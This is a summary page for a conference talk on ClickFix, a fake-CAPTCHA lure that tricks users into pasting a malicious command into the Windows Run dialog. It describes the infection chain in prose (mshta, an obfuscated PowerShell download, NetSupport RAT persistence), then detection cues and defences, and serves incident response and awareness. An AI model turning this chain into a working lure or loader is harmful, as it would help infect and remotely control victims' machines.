Ghost in the Clipboard: Investigating ClickFix as an Initial Infection Routine

Johnny Westfall · 24:49 · 2025 · Track 2

incident-responseblue-teamthreat-intel

Johnny Westfall on ghost in the clipboard. A Track 2 session from Simply CyberCon 2025.

Open this segment on YouTube ↗ · jumps to 3:54:26 in the Track 2 livestream

Ghost in the Clipboard: ClickFix as the New Phishing

Johnny Westfall, an MDR analyst at Unit 42, wants you to hate CAPTCHAs by the time he is done. ClickFix is a social engineering technique that tricks users into copying a malicious command and pasting it into the Windows Run dialog. Since it appeared in late 2024 delivering Lumma Stealer, it has surged 500 percent and is now the second most common attack method behind phishing.

Meet Dwight

Johnny investigates a fictional user named Dwight who treats every CAPTCHA as a personal challenge to prove he is not a robot. Dwight encounters what looks like a normal verify-you-are-human page. The instructions tell him to hit Windows+R, paste, and press Enter. What he actually pastes is a command that launches mshta.exe (Microsoft HTML Application Host) which then spawns PowerShell, pulls down a payload from a remote server, drops NetSupport RAT into persistence via a Run registry key, hides the install path with attrib +h, and starts client32.exe on every login.

The Process Tree Tells the Story

Walking the chain in EDR: explorer.exe spawns mshta.exe, which spawns PowerShell with an obfuscated command that creates a WebClient and invokes whatever is at b.png (which is not a PNG). The smoking guns are mshta making outbound network connections (it should not), PowerShell executing remote content from an obfuscated command line, and NetSupport running from an abnormal path. NetSupport itself is not malware, it is a legitimate remote admin tool used by schools and universities, which is exactly why attackers picked it. The Explorer RunMRU registry key holds the receipts: it logs what the user typed into Run, including the spoofed verify-you-are-a-human command.

Why It Works and How to Stop It

ClickFix works because users have been trained for years not to click sketchy links and not to download random files, but they have also been trained to robotically complete CAPTCHAs to get on with their day. They are not inspecting the source. Johnny's defense is unglamorous: GPO to block PowerShell for users who do not need it, GPO to block the Run dialog for the same population, and continuous user training, because in six months ClickFix will look different but the underlying pattern of tricking users into running attacker code will not.

Who Should Watch

SOC and MDR analysts who are seeing a lot of mshta or PowerShell alerts and want a clean reference for the chain. Detection engineers building hunts on RunMRU and unusual mshta network behavior. Awareness teams trying to convince leadership that CAPTCHA literacy is now a security topic.